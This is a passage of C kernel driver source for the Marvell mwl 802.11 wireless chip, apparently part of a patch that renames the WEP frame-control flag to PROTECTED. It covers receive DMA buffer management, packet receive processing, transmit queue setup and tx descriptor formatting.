M_80211_NODE, M_NOWAIT|M_ZERO); if (mn == NULL) { /* XXX stat+msg */ return NULL; } DPRINTF(sc, MWL_DEBUG_NODE, "%s: mn %p\n", __func__, mn); return &mn->mn_node; } static void mwl_node_cleanup(struct ieee80211_node *ni) { struct ieee80211com *ic = ni->ni_ic; struct mwl_softc *sc = ic->ic_ifp->if_softc; struct mwl_node *mn = MWL_NODE(ni); DPRINTF(sc, MWL_DEBUG_NODE, "%s: ni %p ic %p staid %d\n", __func__, ni, ni->ni_ic, mn->mn_staid); if (mn->mn_staid != 0) { struct ieee80211vap *vap = ni->ni_vap; if (mn->mn_hvap != NULL) { if (vap->iv_opmode == IEEE80211_M_STA) mwl_hal_delstation(mn->mn_hvap, vap->iv_myaddr); else mwl_hal_delstation(mn->mn_hvap, ni->ni_macaddr); } /* * NB: legacy WDS peer sta db entry is installed using * the associate ap's hvap; use it again to delete it. * XXX can vap be NULL? */ else if (vap->iv_opmode == IEEE80211_M_WDS && MWL_VAP(vap)->mv_ap_hvap != NULL) mwl_hal_delstation(MWL_VAP(vap)->mv_ap_hvap, ni->ni_macaddr); delstaid(sc, mn->mn_staid); mn->mn_staid = 0; } sc->sc_node_cleanup(ni); } /* * Reclaim rx dma buffers from packets sitting on the ampdu * reorder queue for a station. We replace buffers with a * system cluster (if available). */ static void mwl_ampdu_rxdma_reclaim(struct ieee80211_rx_ampdu *rap) { #if 0 int i, n, off; struct mbuf *m; void *cl; n = rap->rxa_qframes; for (i = 0; i < rap->rxa_wnd && n > 0; i++) { m = rap->rxa_m[i]; if (m == NULL) continue; n--; /* our dma buffers have a well-known free routine */ if ((m->m_flags & M_EXT) == 0 || m->m_ext.ext_free != mwl_ext_free) continue; /* * Try to allocate a cluster and move the data. */ off = m->m_data - m->m_ext.ext_buf; if (off + m->m_pkthdr.len > MCLBYTES) { /* XXX no AMSDU for now */ continue; } cl = pool_cache_get_paddr(&mclpool_cache, 0, &m->m_ext.ext_paddr); if (cl != NULL) { /* * Copy the existing data to the cluster, remove * the rx dma buffer, and attach the cluster in * its place. Note we preserve the offset to the * data so frames being bridged can still prepend * their headers without adding another mbuf. */ memcpy((caddr_t) cl + off, m->m_data, m->m_pkthdr.len); MEXTREMOVE(m); MEXTADD(m, cl, MCLBYTES, 0, NULL, &mclpool_cache); /* setup mbuf like _MCLGET does */ m->m_flags |= M_CLUSTER | M_EXT_RW; _MOWNERREF(m, M_EXT | M_CLUSTER); /* NB: m_data is clobbered by MEXTADDR, adjust */ m->m_data += off; } } #endif } /* * Callback to reclaim resources. We first let the * net80211 layer do it's thing, then if we are still * blocked by a lack of rx dma buffers we walk the ampdu * reorder q's to reclaim buffers by copying to a system * cluster. */ static void mwl_node_drain(struct ieee80211_node *ni) { struct ieee80211com *ic = ni->ni_ic; struct mwl_softc *sc = ic->ic_ifp->if_softc; struct mwl_node *mn = MWL_NODE(ni); DPRINTF(sc, MWL_DEBUG_NODE, "%s: ni %p vap %p staid %d\n", __func__, ni, ni->ni_vap, mn->mn_staid); /* NB: call up first to age out ampdu q's */ sc->sc_node_drain(ni); /* XXX better to not check low water mark? */ if (sc->sc_rxblocked && mn->mn_staid != 0 && (ni->ni_flags & IEEE80211_NODE_HT)) { uint8_t tid; /* * Walk the reorder q and reclaim rx dma buffers by copying * the packet contents into clusters. */ for (tid = 0; tid < WME_NUM_TID; tid++) { struct ieee80211_rx_ampdu *rap; rap = &ni->ni_rx_ampdu[tid]; if ((rap->rxa_flags & IEEE80211_AGGR_XCHGPEND) == 0) continue; if (rap->rxa_qframes) mwl_ampdu_rxdma_reclaim(rap); } } } static void mwl_node_getsignal(const struct ieee80211_node *ni, int8_t *rssi, int8_t *noise) { *rssi = ni->ni_ic->ic_node_getrssi(ni); #ifdef MWL_ANT_INFO_SUPPORT #if 0 /* XXX need to smooth data */ *noise = -MWL_NODE_CONST(ni)->mn_ai.nf; #else *noise = -95; /* XXX */ #endif #else *noise = -95; /* XXX */ #endif } /* * Convert Hardware per-antenna rssi info to common format: * Let a1, a2, a3 represent the amplitudes per chain * Let amax represent max[a1, a2, a3] * Rssi1_dBm = RSSI_dBm + 20*log10(a1/amax) * Rssi1_dBm = RSSI_dBm + 20*log10(a1) - 20*log10(amax) * We store a table that is 4*20*log10(idx) - the extra 4 is to store or * maintain some extra precision. * * Values are stored in .5 db format capped at 127. */ static void mwl_node_getmimoinfo(const struct ieee80211_node *ni, struct ieee80211_mimo_info *mi) { #define CVT(_dst, _src) do { \ (_dst) = rssi + ((logdbtbl[_src] - logdbtbl[rssi_max]) >> 2); \ (_dst) = (_dst) > 64 ? 127 : ((_dst) << 1); \ } while (0) static const int8_t logdbtbl[32] = { 0, 0, 24, 38, 48, 56, 62, 68, 72, 76, 80, 83, 86, 89, 92, 94, 96, 98, 100, 102, 104, 106, 107, 109, 110, 112, 113, 115, 116, 117, 118, 119 }; const struct mwl_node *mn = MWL_NODE_CONST(ni); uint8_t rssi = mn->mn_ai.rsvd1/2; /* XXX */ uint32_t rssi_max; rssi_max = mn->mn_ai.rssi_a; if (mn->mn_ai.rssi_b > rssi_max) rssi_max = mn->mn_ai.rssi_b; if (mn->mn_ai.rssi_c > rssi_max) rssi_max = mn->mn_ai.rssi_c; CVT(mi->rssi[0], mn->mn_ai.rssi_a); CVT(mi->rssi[1], mn->mn_ai.rssi_b); CVT(mi->rssi[2], mn->mn_ai.rssi_c); mi->noise[0] = mn->mn_ai.nf_a; mi->noise[1] = mn->mn_ai.nf_b; mi->noise[2] = mn->mn_ai.nf_c; #undef CVT } static __inline void * mwl_getrxdma(struct mwl_softc *sc) { struct mwl_jumbo *buf; void *data; /* * Allocate from jumbo pool. */ MWL_RXFREE_LOCK(sc); buf = SLIST_FIRST(&sc->sc_rxfree); if (buf == NULL) { DPRINTF(sc, MWL_DEBUG_ANY, "%s: out of rx dma buffers\n", __func__); sc->sc_stats.mst_rx_nodmabuf++; data = NULL; } else { SLIST_REMOVE_HEAD(&sc->sc_rxfree, next); sc->sc_nrxfree--; data = MWL_JUMBO_BUF2DATA(buf); } MWL_RXFREE_UNLOCK(sc); return data; } static __inline void mwl_putrxdma(struct mwl_softc *sc, void *data) { struct mwl_jumbo *buf; /* XXX bounds check data */ MWL_RXFREE_LOCK(sc); buf = MWL_JUMBO_DATA2BUF(data); SLIST_INSERT_HEAD(&sc->sc_rxfree, buf, next); sc->sc_nrxfree++; MWL_RXFREE_UNLOCK(sc); } static int mwl_rxbuf_init(struct mwl_softc *sc, struct mwl_rxbuf *bf) { struct mwl_rxdesc *ds; ds = bf->bf_desc; if (bf->bf_data == NULL) { bf->bf_data = mwl_getrxdma(sc); if (bf->bf_data == NULL) { /* mark descriptor to be skipped */ ds->RxControl = EAGLE_RXD_CTRL_OS_OWN; /* NB: don't need PREREAD */ MWL_RXDESC_SYNC(sc, ds, BUS_DMASYNC_PREWRITE); sc->sc_stats.mst_rxbuf_failed++; return ENOMEM; } } /* * NB: DMA buffer contents is known to be unmodified * so there's no need to flush the data cache. */ /* * Setup descriptor. */ ds->QosCtrl = 0; ds->RSSI = 0; ds->Status = EAGLE_RXD_STATUS_IDLE; ds->Channel = 0; ds->PktLen = htole16(MWL_AGGR_SIZE); ds->SQ2 = 0; ds->pPhysBuffData = htole32(MWL_JUMBO_DMA_ADDR(sc, bf->bf_data)); /* NB: don't touch pPhysNext, set once */ ds->RxControl = EAGLE_RXD_CTRL_DRIVER_OWN; MWL_RXDESC_SYNC(sc, ds, BUS_DMASYNC_PREREAD | BUS_DMASYNC_PREWRITE); return 0; } static int mwl_ext_free(struct mbuf *m, void *data, void *arg) { struct mwl_softc *sc = arg; /* XXX bounds check data */ mwl_putrxdma(sc, data); /* * If we were previously blocked by a lack of rx dma buffers * check if we now have enough to restart rx interrupt handling. * NB: we know we are called at splvm which is above splnet. */ if (sc->sc_rxblocked && sc->sc_nrxfree > mwl_rxdmalow) { sc->sc_rxblocked = 0; mwl_hal_intrset(sc->sc_mh, sc->sc_imask); } return (EXT_FREE_OK); } struct mwl_frame_bar { u_int8_t i_fc[2]; u_int8_t i_dur[2]; u_int8_t i_ra[IEEE80211_ADDR_LEN]; u_int8_t i_ta[IEEE80211_ADDR_LEN]; /* ctl, seq, FCS */ } __packed; /* * Like ieee80211_anyhdrsize, but handles BAR frames * specially so the logic below to piece the 802.11 * header together works. */ static __inline int mwl_anyhdrsize(const void *data) { const struct ieee80211_frame *wh = data; if ((wh->i_fc[0]&IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_CTL) { switch (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) { case IEEE80211_FC0_SUBTYPE_CTS: case IEEE80211_FC0_SUBTYPE_ACK: return sizeof(struct ieee80211_frame_ack); case IEEE80211_FC0_SUBTYPE_BAR: return sizeof(struct mwl_frame_bar); } return sizeof(struct ieee80211_frame_min); } else return ieee80211_hdrsize(data); } static void mwl_handlemicerror(struct ieee80211com *ic, const uint8_t *data) { const struct ieee80211_frame *wh; struct ieee80211_node *ni; wh = (const struct ieee80211_frame *)(data + sizeof(uint16_t)); ni = ieee80211_find_rxnode(ic, (const struct ieee80211_frame_min *) wh); if (ni != NULL) { ieee80211_notify_michael_failure(ni->ni_vap, wh, 0); ieee80211_free_node(ni); } } /* * Convert hardware signal strength to rssi. The value * provided by the device has the noise floor added in; * we need to compensate for this but we don't have that * so we use a fixed value. * * The offset of 8 is good for both 2.4 and 5GHz. The LNA * offset is already set as part of the initial gain. This * will give at least +/- 3dB for 2.4GHz and +/- 5dB for 5GHz. */ static __inline int cvtrssi(uint8_t ssi) { int rssi = (int) ssi + 8; /* XXX hack guess until we have a real noise floor */ rssi = 2*(87 - rssi); /* NB: .5 dBm units */ return (rssi < 0 ? 0 : rssi > 127 ? 127 : rssi); } static void mwl_rx_proc(void *arg, int npending) { #define IEEE80211_DIR_DSTODS(wh) \ ((((const struct ieee80211_frame *)wh)->i_fc[1] & IEEE80211_FC1_DIR_MASK) == IEEE80211_FC1_DIR_DSTODS) struct mwl_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct mwl_rxbuf *bf; struct mwl_rxdesc *ds; struct mbuf *m; struct ieee80211_qosframe *wh; struct ieee80211_qosframe_addr4 *wh4; struct ieee80211_node *ni; struct mwl_node *mn; int off, len, hdrlen, pktlen, rssi, ntodo; uint8_t *data, status; void *newdata; int16_t nf; DPRINTF(sc, MWL_DEBUG_RX_PROC, "%s: pending %u rdptr 0x%x wrptr 0x%x\n", __func__, npending, RD4(sc, sc->sc_hwspecs.rxDescRead), RD4(sc, sc->sc_hwspecs.rxDescWrite)); nf = -96; /* XXX */ bf = sc->sc_rxnext; for (ntodo = mwl_rxquota; ntodo > 0; ntodo--) { if (bf == NULL) bf = STAILQ_FIRST(&sc->sc_rxbuf); ds = bf->bf_desc; data = bf->bf_data; if (data == NULL) { /* * If data allocation failed previously there * will be no buffer; try again to re-populate it. * Note the firmware will not advance to the next * descriptor with a dma buffer so we must mimic * this or we'll get out of sync. */ DPRINTF(sc, MWL_DEBUG_ANY, "%s: rx buf w/o dma memory\n", __func__); (void) mwl_rxbuf_init(sc, bf); sc->sc_stats.mst_rx_dmabufmissing++; break; } MWL_RXDESC_SYNC(sc, ds, BUS_DMASYNC_POSTREAD | BUS_DMASYNC_POSTWRITE); if (ds->RxControl != EAGLE_RXD_CTRL_DMA_OWN) break; #ifdef MWL_DEBUG if (sc->sc_debug & MWL_DEBUG_RECV_DESC) mwl_printrxbuf(bf, 0); #endif status = ds->Status; if (status & EAGLE_RXD_STATUS_DECRYPT_ERR_MASK) { ifp->if_ierrors++; sc->sc_stats.mst_rx_crypto++; /* * NB: Check EAGLE_RXD_STATUS_GENERAL_DECRYPT_ERR * for backwards compatibility. */ if (status != EAGLE_RXD_STATUS_GENERAL_DECRYPT_ERR && (status & EAGLE_RXD_STATUS_TKIP_MIC_DECRYPT_ERR)) { /* * MIC error, notify upper layers. */ bus_dmamap_sync(sc->sc_rxdmat, sc->sc_rxmap, BUS_DMASYNC_POSTREAD); mwl_handlemicerror(ic, data); sc->sc_stats.mst_rx_tkipmic++; } /* XXX too painful to tap packets */ goto rx_next; } /* * Sync the data buffer. */ len = le16toh(ds->PktLen); bus_dmamap_sync(sc->sc_rxdmat, sc->sc_rxmap, BUS_DMASYNC_POSTREAD); /* * The 802.11 header is provided all or in part at the front; * use it to calculate the true size of the header that we'll * construct below. We use this to figure out where to copy * payload prior to constructing the header. */ hdrlen = mwl_anyhdrsize(data + sizeof(uint16_t)); off = sizeof(uint16_t) + sizeof(struct ieee80211_frame_addr4); /* calculate rssi early so we can re-use for each aggregate */ rssi = cvtrssi(ds->RSSI); pktlen = hdrlen + (len - off); /* * NB: we know our frame is at least as large as * IEEE80211_MIN_LEN because there is a 4-address * frame at the front. Hence there's no need to * vet the packet length. If the frame in fact * is too small it should be discarded at the * net80211 layer. */ /* * Attach dma buffer to an mbuf. We tried * doing this based on the packet size (i.e. * copying small packets) but it turns out to * be a net loss. The tradeoff might be system * dependent (cache architecture is important). */ MGETHDR(m, M_NOWAIT, MT_DATA); if (m == NULL) { DPRINTF(sc, MWL_DEBUG_ANY, "%s: no rx mbuf\n", __func__); sc->sc_stats.mst_rx_nombuf++; goto rx_next; } /* * Acquire the replacement dma buffer before * processing the frame. If we're out of dma * buffers we disable rx interrupts and wait * for the free pool to reach mlw_rxdmalow buffers * before starting to do work again. If the firmware * runs out of descriptors then it will toss frames * which is better than our doing it as that can * starve our processing. It is also important that * we always process rx'd frames in case they are * A-MPDU as otherwise the host's view of the BA * window may get out of sync with the firmware. */ newdata = mwl_getrxdma(sc); if (newdata == NULL) { /* NB: stat+msg in mwl_getrxdma */ m_free(m); /* disable RX interrupt and mark state */ mwl_hal_intrset(sc->sc_mh, sc->sc_imask &~ MACREG_A2HRIC_BIT_RX_RDY); sc->sc_rxblocked = 1; ieee80211_drain(ic); /* XXX check rxblocked and immediately start again? */ goto rx_stop; } bf->bf_data = newdata; /* * Attach the dma buffer to the mbuf; * mwl_rxbuf_init will re-setup the rx * descriptor using the replacement dma * buffer we just installed above. */ MEXTADD(m, data, MWL_AGGR_SIZE, mwl_ext_free, data, sc, 0, EXT_NET_DRV); m->m_data += off - hdrlen; m->m_pkthdr.len = m->m_len = pktlen; m->m_pkthdr.rcvif = ifp; /* NB: dma buffer assumed read-only */ /* * Piece 802.11 header together. */ wh = mtod(m, struct ieee80211_qosframe *); /* NB: don't need to do this sometimes but ... */ /* XXX special case so we can memcpy after m_devget? */ ovbcopy(data + sizeof(uint16_t), wh, hdrlen); if (IEEE80211_QOS_HAS_SEQ(wh)) { if (IEEE80211_DIR_DSTODS(wh)) { wh4 = mtod(m, struct ieee80211_qosframe_addr4*); *(uint16_t *)wh4->i_qos = ds->QosCtrl; } else { *(uint16_t *)wh->i_qos = ds->QosCtrl; } } /* * The f/w strips WEP header but doesn't clear * the WEP bit; mark the packet with M_WEP so * net80211 will treat the data as decrypted. * While here also clear the PWR_MGT bit since * power save is handled by the firmware and * passing this up will potentially cause the * upper layer to put a station in power save * (except when configured with MWL_HOST_PS_SUPPORT). */ - if (wh->i_fc[1] & IEEE80211_FC1_WEP) + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) m->m_flags |= M_WEP; #ifdef MWL_HOST_PS_SUPPORT - wh->i_fc[1] &= ~IEEE80211_FC1_WEP; + wh->i_fc[1] &= ~IEEE80211_FC1_PROTECTED; #else - wh->i_fc[1] &= ~(IEEE80211_FC1_WEP | IEEE80211_FC1_PWR_MGT); + wh->i_fc[1] &= ~(IEEE80211_FC1_PROTECTED | + IEEE80211_FC1_PWR_MGT); #endif if (ieee80211_radiotap_active(ic)) { struct mwl_rx_radiotap_header *tap = &sc->sc_rx_th; tap->wr_flags = 0; tap->wr_rate = ds->Rate; tap->wr_antsignal = rssi + nf; tap->wr_antnoise = nf; } if (IFF_DUMPPKTS_RECV(sc, wh)) { ieee80211_dump_pkt(ic, mtod(m, caddr_t), len, ds->Rate, rssi); } ifp->if_ipackets++; /* dispatch */ ni = ieee80211_find_rxnode(ic, (const struct ieee80211_frame_min *) wh); if (ni != NULL) { mn = MWL_NODE(ni); #ifdef MWL_ANT_INFO_SUPPORT mn->mn_ai.rssi_a = ds->ai.rssi_a; mn->mn_ai.rssi_b = ds->ai.rssi_b; mn->mn_ai.rssi_c = ds->ai.rssi_c; mn->mn_ai.rsvd1 = rssi; #endif /* tag AMPDU aggregates for reorder processing */ if (ni->ni_flags & IEEE80211_NODE_HT) m->m_flags |= M_AMPDU; (void) ieee80211_input(ni, m, rssi, nf); ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi, nf); rx_next: /* NB: ignore ENOMEM so we process more descriptors */ (void) mwl_rxbuf_init(sc, bf); bf = STAILQ_NEXT(bf, bf_list); } rx_stop: sc->sc_rxnext = bf; if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0 && !IFQ_IS_EMPTY(&ifp->if_snd)) { /* NB: kick fw; the tx thread may have been preempted */ mwl_hal_txstart(sc->sc_mh, 0); mwl_start(ifp); } #undef IEEE80211_DIR_DSTODS } static void mwl_txq_init(struct mwl_softc *sc, struct mwl_txq *txq, int qnum) { struct mwl_txbuf *bf, *bn; struct mwl_txdesc *ds; MWL_TXQ_LOCK_INIT(sc, txq); txq->qnum = qnum; txq->txpri = 0; /* XXX */ #if 0 /* NB: q setup by mwl_txdma_setup XXX */ STAILQ_INIT(&txq->free); #endif STAILQ_FOREACH(bf, &txq->free, bf_list) { bf->bf_txq = txq; ds = bf->bf_desc; bn = STAILQ_NEXT(bf, bf_list); if (bn == NULL) bn = STAILQ_FIRST(&txq->free); ds->pPhysNext = htole32(bn->bf_daddr); } STAILQ_INIT(&txq->active); } /* * Setup a hardware data transmit queue for the specified * access control. We record the mapping from ac's * to h/w queues for use by mwl_tx_start. */ static int mwl_tx_setup(struct mwl_softc *sc, int ac, int mvtype) { #define N(a) (sizeof(a)/sizeof(a[0])) struct mwl_txq *txq; if (ac >= N(sc->sc_ac2q)) { device_printf(sc->sc_dev, "AC %u out of range, max %zu!\n", ac, N(sc->sc_ac2q)); return 0; } if (mvtype >= MWL_NUM_TX_QUEUES) { device_printf(sc->sc_dev, "mvtype %u out of range, max %u!\n", mvtype, MWL_NUM_TX_QUEUES); return 0; } txq = &sc->sc_txq[mvtype]; mwl_txq_init(sc, txq, mvtype); sc->sc_ac2q[ac] = txq; return 1; #undef N } /* * Update WME parameters for a transmit queue. */ static int mwl_txq_update(struct mwl_softc *sc, int ac) { #define MWL_EXPONENT_TO_VALUE(v) ((1<sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct mwl_txq *txq = sc->sc_ac2q[ac]; struct wmeParams *wmep = &ic->ic_wme.wme_chanParams.cap_wmeParams[ac]; struct mwl_hal *mh = sc->sc_mh; int aifs, cwmin, cwmax, txoplim; aifs = wmep->wmep_aifsn; /* XXX in sta mode need to pass log values for cwmin/max */ cwmin = MWL_EXPONENT_TO_VALUE(wmep->wmep_logcwmin); cwmax = MWL_EXPONENT_TO_VALUE(wmep->wmep_logcwmax); txoplim = wmep->wmep_txopLimit; /* NB: units of 32us */ if (mwl_hal_setedcaparams(mh, txq->qnum, cwmin, cwmax, aifs, txoplim)) { device_printf(sc->sc_dev, "unable to update hardware queue " "parameters for %s traffic!\n", ieee80211_wme_acnames[ac]); return 0; } return 1; #undef MWL_EXPONENT_TO_VALUE } /* * Callback from the 802.11 layer to update WME parameters. */ static int mwl_wme_update(struct ieee80211com *ic) { struct mwl_softc *sc = ic->ic_ifp->if_softc; return !mwl_txq_update(sc, WME_AC_BE) || !mwl_txq_update(sc, WME_AC_BK) || !mwl_txq_update(sc, WME_AC_VI) || !mwl_txq_update(sc, WME_AC_VO) ? EIO : 0; } /* * Reclaim resources for a setup queue. */ static void mwl_tx_cleanupq(struct mwl_softc *sc, struct mwl_txq *txq) { /* XXX hal work? */ MWL_TXQ_LOCK_DESTROY(txq); } /* * Reclaim all tx queue resources. */ static void mwl_tx_cleanup(struct mwl_softc *sc) { int i; for (i = 0; i < MWL_NUM_TX_QUEUES; i++) mwl_tx_cleanupq(sc, &sc->sc_txq[i]); } static int mwl_tx_dmasetup(struct mwl_softc *sc, struct mwl_txbuf *bf, struct mbuf *m0) { struct mbuf *m; int error; /* * Load the DMA map so any coalescing is done. This * also calculates the number of descriptors we need. */ error = bus_dmamap_load_mbuf_sg(sc->sc_dmat, bf->bf_dmamap, m0, bf->bf_segs, &bf->bf_nseg, BUS_DMA_NOWAIT); if (error == EFBIG) { /* XXX packet requires too many descriptors */ bf->bf_nseg = MWL_TXDESC+1; } else if (error != 0) { sc->sc_stats.mst_tx_busdma++; m_freem(m0); return error; } /* * Discard null packets and check for packets that * require too many TX descriptors. We try to convert * the latter to a cluster. */ if (error == EFBIG) { /* too many desc's, linearize */ sc->sc_stats.mst_tx_linear++; #if MWL_TXDESC > 1 m = m_collapse(m0, M_NOWAIT, MWL_TXDESC); #else m = m_defrag(m0, M_NOWAIT); #endif if (m == NULL) { m_freem(m0); sc->sc_stats.mst_tx_nombuf++; return ENOMEM; } m0 = m; error = bus_dmamap_load_mbuf_sg(sc->sc_dmat, bf->bf_dmamap, m0, bf->bf_segs, &bf->bf_nseg, BUS_DMA_NOWAIT); if (error != 0) { sc->sc_stats.mst_tx_busdma++; m_freem(m0); return error; } KASSERT(bf->bf_nseg <= MWL_TXDESC, ("too many segments after defrag; nseg %u", bf->bf_nseg)); } else if (bf->bf_nseg == 0) { /* null packet, discard */ sc->sc_stats.mst_tx_nodata++; m_freem(m0); return EIO; } DPRINTF(sc, MWL_DEBUG_XMIT, "%s: m %p len %u\n", __func__, m0, m0->m_pkthdr.len); bus_dmamap_sync(sc->sc_dmat, bf->bf_dmamap, BUS_DMASYNC_PREWRITE); bf->bf_m = m0; return 0; } static __inline int mwl_cvtlegacyrate(int rate) { switch (rate) { case 2: return 0; case 4: return 1; case 11: return 2; case 22: return 3; case 44: return 4; case 12: return 5; case 18: return 6; case 24: return 7; case 36: return 8; case 48: return 9; case 72: return 10; case 96: return 11; case 108:return 12; } return 0; } /* * Calculate fixed tx rate information per client state; * this value is suitable for writing to the Format field * of a tx descriptor. */ static uint16_t mwl_calcformat(uint8_t rate, const struct ieee80211_node *ni) { uint16_t fmt; fmt = SM(3, EAGLE_TXD_ANTENNA) | (IEEE80211_IS_CHAN_HT40D(ni->ni_chan) ? EAGLE_TXD_EXTCHAN_LO : EAGLE_TXD_EXTCHAN_HI); if (rate & IEEE80211_RATE_MCS) { /* HT MCS */ fmt |= EAGLE_TXD_FORMAT_HT /* NB: 0x80 implicitly stripped from ucastrate */ | SM(rate, EAGLE_TXD_RATE); /* XXX short/long GI may be wrong; re-check */ if (IEEE80211_IS_CHAN_HT40(ni->ni_chan)) { fmt |= EAGLE_TXD_CHW_40 | (ni->ni_htcap & IEEE80211_HTCAP_SHORTGI40 ? EAGLE_TXD_GI_SHORT : EAGLE_TXD_GI_LONG); } else { fmt |= EAGLE_TXD_CHW_20 | (ni->ni_htcap & IEEE80211_HTCAP_SHORTGI20 ? EAGLE_TXD_GI_SHORT : EAGLE_TXD_GI_LONG); } } else { /* legacy rate */ fmt |= EAGLE_TXD_FORMAT_LEGACY | SM(mwl_cvtlegacyrate(rate), EAGLE_TXD_RATE) | EAGLE_TXD_CHW_20 /* XXX iv_flags & IEEE80211_F_SHPREAMBLE? */ | (ni->ni_capinfo & IEEE80211_CAPINFO_SHORT_PREAMBLE ? EAGLE_TXD_PREAMBLE_SHORT : EAGLE_TXD_PREAMBLE_LONG); } return fmt; } static int mwl_tx_start(struct mwl_softc *sc, struct ieee80211_node *ni, struct mwl_txbuf *bf, struct mbuf *m0) { #define IEEE80211_DIR_DSTODS(wh) \ ((wh->i_fc[1] & IEEE80211_FC1_DIR_MASK) == IEEE80211_FC1_DIR_DSTODS) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; int error, iswep, ismcast; int hdrlen, copyhdrlen, pktlen; struct mwl_txdesc *ds; struct mwl_txq *txq; struct ieee80211_frame *wh; struct mwltxrec *tr; struct mwl_node *mn; uint16_t qos; #if MWL_TXDESC > 1 int i; #endif wh = mtod(m0, struct ieee80211_frame *); - iswep = wh->i_fc[1] & IEEE80211_FC1_WEP; + iswep = wh->i_fc[1] & IEEE80211_FC1_PROTECTED; ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); hdrlen = ieee80211_anyhdrsize(wh); copyhdrlen = hdrlen; pktlen = m0->m_pkthdr.len; if (IEEE80211_QOS_HAS_SEQ(wh)) { if (IEEE80211_DIR_DSTODS(wh)) { qos = *(uint16_t *) (((struct ieee80211_qosframe_addr4 *) wh)->i_qos); copyhdrlen -= sizeof(qos); } else qos = *(uint16_t *) (((struct ieee80211_qosframe *) wh)->i_qos); } else qos = 0; if (iswep) { const struct ieee80211_cipher *cip; struct ieee80211_key *k; /* * Construct the 802.11 header+trailer for an encrypted * frame. The only reason this can fail is because of an * unknown or unsupported cipher/key type. * * NB: we do this even though the firmware will ignore * what we've done for WEP and TKIP as we need the * ExtIV filled in for CCMP and this also adjusts * the headers which simplifies our work below. */ k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { /* * This can happen when the key is yanked after the * frame was queued. Just discard the frame; the * 802.11 layer counts failures and provides * debugging/diagnostics. */ m_freem(m0); return EIO; } /* * Adjust the packet length for the crypto additions * done during encap and any other bits that the f/w * will add later on. */ cip = k->wk_cipher; pktlen += cip->ic_header + cip->ic_miclen + cip->ic_trailer; /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } if (ieee80211_radiotap_active_vap(vap)) { sc->sc_tx_th.wt_flags = 0; /* XXX */ if (iswep) sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_WEP; #if 0 sc->sc_tx_th.wt_rate = ds->DataRate; #endif sc->sc_tx_th.wt_txpower = ni->ni_txpower; sc->sc_tx_th.wt_antenna = sc->sc_txantenna; ieee80211_radiotap_tx(vap, m0); } /* * Copy up/down the 802.11 header; the firmware requires * we present a 2-byte payload length followed by a * 4-address header (w/o QoS), followed (optionally) by * any WEP/ExtIV header (but only filled in for CCMP). * We are assured the mbuf has sufficient headroom to * prepend in-place by the setup of ic_headroom in * mwl_attach. */ if (hdrlen < sizeof(struct mwltxrec)) { const int space = sizeof(struct mwltxrec) - hdrlen; if (M_LEADINGSPACE(m0) < space) { /* NB: should never happen */ device_printf(sc->sc_dev, "not enough headroom, need %d found %zd, " "m_flags 0x%x m_len %d\n", space, M_LEADINGSPACE(m0), m0->m_flags, m0->m_len); ieee80211_dump_pkt(ic, mtod(m0, const uint8_t *), m0->m_len, 0, -1); m_freem(m0); sc->sc_stats.mst_tx_noheadroom++; return EIO; } M_PREPEND(m0, space, M_NOWAIT); } tr = mtod(m0, struct mwltxrec *); if (wh != (struct ieee80211_frame *) &tr->wh) ovbcopy(wh, &tr->wh, hdrlen); /* * Note: the "firmware length" is actually the length * of the fully formed "802.11 payload". That is, it's * everything except for the 802.11 header. In particular * this includes all crypto material including the MIC! */ tr->fwlen = htole16(pktlen - hdrlen); /* * Load the DMA map so any coalescing is done. This * also calculates the number of descriptors we need. */ error = mwl_tx_dmasetup(sc, bf, m0); if (error != 0) { /* NB: stat collected in mwl_tx_dmasetup */ DPRINTF(sc, MWL_DEBUG_XMIT, "%s: unable to setup dma\n", __func__); return error; } bf->bf_node = ni; /* NB: held reference */ m0 = bf->bf_m; /* NB: may have changed */ tr = mtod(m0, struct mwltxrec *); wh = (struct ieee80211_frame *)&tr->wh; /* * Formulate tx descriptor. */ ds = bf->bf_desc; txq = bf->bf_txq; ds->QosCtrl = qos; /* NB: already little-endian */ #if MWL_TXDESC == 1 /* * NB: multiframes should be zero because the descriptors * are initialized to zero. This should handle the case * where the driver is built with MWL_TXDESC=1 but we are * using firmware with multi-segment support. */ ds->PktPtr = htole32(bf->bf_segs[0].ds_addr); ds->PktLen = htole16(bf->bf_segs[0].ds_len); #else ds->multiframes = htole32(bf->bf_nseg); ds->PktLen = htole16(m0->m_pkthdr.len); for (i = 0; i < bf->bf_nseg; i++) { ds->PktPtrArray[i] = htole32(bf->bf_segs[i].ds_addr); ds->PktLenArray[i] = htole16(bf->bf_segs[i].ds_len); } #endif /* NB: pPhysNext, DataRate, and SapPktInfo setup once, don't touch */ ds->Format = 0; ds->pad = 0; ds->ack_wcb_addr = 0; mn = MWL_NODE(ni); /* * Select transmit rate. */ switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { case IEEE80211_FC0_TYPE_MGT: sc->sc_stats.mst_tx_mgmt++; /* fall thru... */ case IEEE80211_FC0_TYPE_CTL: /* NB: assign to BE q to avoid bursting */ ds->TxPriority = MWL_WME_AC_BE; break; case IEEE80211_FC0_TYPE_DATA: if (!ismcast) { const struct ieee80211_txparam *tp = ni->ni_txparms; /* * EAPOL frames get forced to a fixed rate and w/o * aggregation; otherwise check for any fixed rate * for the client (may depend on association state). */ if (m0->m_flags & M_EAPOL) { const struct mwl_vap *mvp = MWL_VAP_CONST(vap); ds->Format = mvp->mv_eapolformat; ds->pad = htole16( EAGLE_TXD_FIXED_RATE | EAGLE_TXD_DONT_AGGR); } else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) { /* XXX pre-calculate per node */ ds->Format = htole16( mwl_calcformat(tp->ucastrate, ni)); ds->pad = htole16(EAGLE_TXD_FIXED_RATE); } /* NB: EAPOL frames will never have qos set */ if (qos == 0) ds->TxPriority = txq->qnum; #if MWL_MAXBA > 3 else if 